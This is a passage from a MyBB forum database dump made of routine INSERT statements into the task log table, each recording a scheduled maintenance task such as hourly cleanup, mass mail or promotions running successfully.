ran.'); INSERT INTO mybb_tasklog VALUES('13665', '1', '1351582661', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13666', '7', '1351582726', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13667', '9', '1351582803', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13668', '3', '1351582838', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13669', '5', '1351588104', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13670', '9', '1351588142', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13671', '3', '1351588154', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13672', '1', '1351588169', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13673', '7', '1351588195', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13674', '9', '1351590081', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13675', '5', '1351590245', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13676', '3', '1351590249', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13677', '5', '1351590399', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13678', '9', '1351595105', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13679', '3', '1351595136', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13680', '1', '1351595168', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13681', '7', '1351595396', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13682', '5', '1351595404', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13683', '9', '1351595664', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13684', '5', '1351596485', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13685', '9', '1351596501', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13686', '3', '1351596609', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13687', '9', '1351597336', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13688', '5', '1351598928', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13689', '9', '1351598952', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13690', '3', '1351598958', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13691', '1', '1351598968', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13692', '4', '1351598971', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13693', '7', '1351599014', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13694', '9', '1351599119', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13695', '5', '1351601326', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13696', '9', '1351601486', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13697', '3', '1351601536', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13698', '9', '1351601953', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13699', '3', '1351602159', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13700', '1', '1351602165', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13701', '7', '1351602499', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13702', '5', '1351604394', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13703', '9', '1351604453', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13704', '3', '1351604463', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13705', '5', '1351604848', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13706', '9', '1351605416', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13707', '3', '1351605679', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13708', '1', '1351605683', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13709', '7', '1351605690', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13710', '5', '1351605953', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13711', '9', '1351608548', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13712', '5', '1351608745', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13713', '3', '1351608828', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13714', '9', '1351608936', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13715', '3', '1351610537', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13716', '1', '1351610545', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13717', '7', '1351610549', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13718', '5', '1351610559', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13719', '9', '1351611148', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13720', '5', '1351611646', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13721', '3', '1351611679', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13722', '9', '1351611735', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13723', '5', '1351611965', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13724', '9', '1351612544', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13725', '3', '1351612828', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13726', '1', '1351612834', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13727', '7', '1351612838', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13728', '5', '1351613311', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13729', '9', '1351613468', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13730', '5', '1351614466', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13731', '9', '1351614488', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13732', '3', '1351614739', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13733', '9', '1351615673', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13734', '5', '1351615684', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13735', '9', '1351616386', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13736', '3', '1351616994', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13737', '1', '1351617011', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13738', '7', '1351617015', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13739', '5', '1351617320', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13740', '9', '1351617774', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13741', '5', '1351617901', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13742', '9', '1351617916', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13743', '3', '1351618351', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13744', '9', '1351619021', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13745', '5', '1351619847', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13746', '9', '1351619873', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13747', '3', '1351619968', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13748', '1', '1351620006', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13749', '7', '1351620014', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13750', '5', '1351620301', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13751', '9', '1351620919', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13752', '5', '1351621548', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13753', '9', '1351621559', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13754', '3', '1351621812', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13755', '9', '1351622480', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13756', '5', '1351622700', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13757', '9', '1351623345', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13758', '3', '1351623710', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13759', '1', '1351623711', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13760', '7', '1351623785', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13761', '5', '1351624538', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13762', '9', '1351624568', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13763', '5', '1351625577', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13764', '9', '1351625580', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13765', '3', '1351625619', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13766', '9', '1351627240', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13767', '5', '1351627243', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13768', '3', '1351627327', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13769', '1', '1351627331', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13770', '7', '1351627336', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13771', '5', '1351627937', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13772', '9', '1351628176', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13773', '5', '1351629122', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13774', '9', '1351629134', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13775', '3', '1351629621', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13776', '9', '1351629639', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13777', '5', '1351630051', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13778', '9', '1351631433', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13779', '3', '1351631441', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13780', '1', '1351631493', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13781', '7', '1351631517', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13782', '5', '1351631854', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13783', '5', '1351632742', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13784', '9', '1351632775', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13785', '3', '1351632788', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13786', '9', '1351633870', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13787', '5', '1351633989', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13788', '9', '1351634122', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13789', '3', '1351634388', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13790', '1', '1351634849', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13791', '7', '1351634854', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13792', '5', '1351634863', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13793', '9', '1351635583', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13794', '5', '1351635994', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13795', '9', '1351636003', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13796', '3', '1351636244', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13797', '9', '1351638507', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13798', '5', '1351638531', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13799', '3', '1351638537', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13800', '1', '1351638547', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13801', '7', '1351638549', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13802', '9', '1351638757', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13803', '5', '1351640415', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13804', '9', '1351640424', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13805', '3', '1351640427', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13806', '5', '1351641149', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13807', '9', '1351641714', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13808', '3', '1351641751', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13809', '1', '1351641754', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13810', '2', '1351641780', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13811', '7', '1351641796', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13812', '11', '1351641816', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13813', '5', '1351641932', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13814', '9', '1351642232', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13815', '5', '1351643110', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13816', '9', '1351643153', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13817', '3', '1351646297', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13818', '9', '1351646947', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13819', '5', '1351646949', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13820', '1', '1351647242', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13821', '7', '1351647318', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13822', '3', '1351647332', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13823', '9', '1351647917', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13824', '5', '1351647930', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13825', '9', '1351648629', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13826', '3', '1351648854', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13827', '1', '1351648870', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13828', '7', '1351648873', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13829', '5', '1351649124', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13830', '9', '1351650258', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13831', '5', '1351650498', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13832', '9', '1351650639', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13833', '3', '1351651169', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13834', '9', '1351651562', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13835', '5', '1351651567', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13836', '9', '1351652173', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13837', '3', '1351652342', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13838', '1', '1351652649', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13839', '7', '1351652656', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13840', '5', '1351652717', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13841', '9', '1351653101', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13842', '5', '1351654612', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13843', '9', '1351654689', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13844', '3', '1351654699', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13845', '9', '1351654915', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13846', '5', '1351655124', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13847', '9', '1351655829', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13848', '3', '1351656027', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13849', '1', '1351656064', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13850', '7', '1351656072', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13851', '5', '1351656416', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13852', '9', '1351656654', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13853', '5', '1351657504', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13854', '9', '1351657530', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13855', '3', '1351657805', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13856', '9', '1351658548', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13857', '5', '1351658790', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13858', '9', '1351659327', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13859', '3', '1351659546', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13860', '1', '1351659658', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13861', '7', '1351659680', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13862', '5', '1351660195', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13863', '9', '1351660220', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13864', '5', '1351661524', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13865', '9', '1351661822', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13866', '3', '1351662103', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13867', '9', '1351662219', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13868', '5', '1351662408', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13869', '9', '1351663191', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13870', '3', '1351663213', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13871', '1', '1351663304', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13872', '7', '1351663315', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13873', '5', '1351663679', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13874', '9', '1351664932', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13875', '5', '1351664986', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13876', '3', '1351665135', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13877', '9', '1351667941', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13878', '5', '1351667960', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13879', '3', '1351667970', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13880', '1', '1351667971', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13881', '7', '1351667975', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13882', '5', '1351668315', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13883', '9', '1351668334', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13884', '3', '1351668636', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13885', '9', '1351669220', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13886', '5', '1351680677', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13887', '9', '1351680775', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13888', '3', '1351680784', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13889', '1', '1351680795', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13890', '7', '1351680920', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13891', '9', '1351684094', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13892', '3', '1351684186', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13893', '1', '1351684197', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13894', '7', '1351684243', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13895', '5', '1351684244', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13896', '9', '1351684520', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13897', '3', '1351684859', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13898', '1', '1351684879', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13899', '4', '1351684895', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13900', '7', '1351684901', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13901', '5', '1351685904', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13902', '9', '1351685911', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13903', '5', '1351686319', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13904', '9', '1351686576', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13905', '3', '1351686642', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13906', '9', '1351688764', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13907', '5', '1351691322', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13908', '3', '1351691614', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13909', '1', '1351691620', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13910', '7', '1351691626', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13911', '9', '1351691880', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13912', '3', '1351692357', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13913', '1', '1351692405', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13914', '7', '1351692485', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13915', '5', '1351692532', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13916', '9', '1351692631', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13917', '5', '1351694732', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13918', '9', '1351695182', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13919', '3', '1351695220', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13920', '9', '1351695473', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13921', '3', '1351696242', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13922', '1', '1351696295', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13923', '7', '1351696301', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13924', '5', '1351696309', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13925', '9', '1351696315', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13926', '5', '1351697101', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13927', '9', '1351697119', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13928', '3', '1351697403', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13929', '9', '1351698022', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13930', '5', '1351699605', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13931', '9', '1351699673', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13932', '3', '1351699677', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13933', '1', '1351700199', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13934', '7', '1351700360', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13935', '9', '1351700384', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13936', '5', '1351700702', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13937', '9', '1351700721', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13938', '3', '1351701033', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13939', '9', '1351703083', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13940', '5', '1351703719', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13941', '3', '1351703734', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13942', '1', '1351703739', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13943', '7', '1351703745', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13944', '9', '1351704150', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13945', '5', '1351704752', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13946', '9', '1351704811', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13947', '3', '1351704819', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13948', '9', '1351705858', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13949', '5', '1351705870', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13950', '9', '1351706628', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13951', '3', '1351707970', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13952', '1', '1351707998', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13953', '7', '1351708016', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13954', '5', '1351708026', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13955', '9', '1351708299', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13956', '3', '1351708345', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13957', '9', '1351708817', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13958', '5', '1351709604', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13959', '9', '1351709915', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13960', '3', '1351709956', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13961', '1', '1351710001', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13962', '7', '1351710005', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13963', '5', '1351710359', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13964', '9', '1351711339', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13965', '5', '1351713163', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13966', '9', '1351713397', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13967', '3', '1351713399', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13968', '3', '1351713894', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13969', '1', '1351714092', 'The hourly cleanup task successfully 